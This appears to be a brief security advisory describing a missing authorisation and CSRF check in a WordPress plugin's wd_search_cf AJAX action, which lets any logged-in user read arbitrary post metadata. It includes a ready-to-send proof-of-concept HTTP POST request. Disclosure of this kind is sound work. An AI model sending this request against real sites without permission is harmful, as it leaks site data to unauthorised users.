The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check in the wd_search_cf
AJAX action, which could allow any authenticated users to call it and retrieve arbitrary post metadata.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=wd_search_cf&wd_required=1&wd_phrase=a&wd_args=eyJsaW1pdCI6MTAwfQ==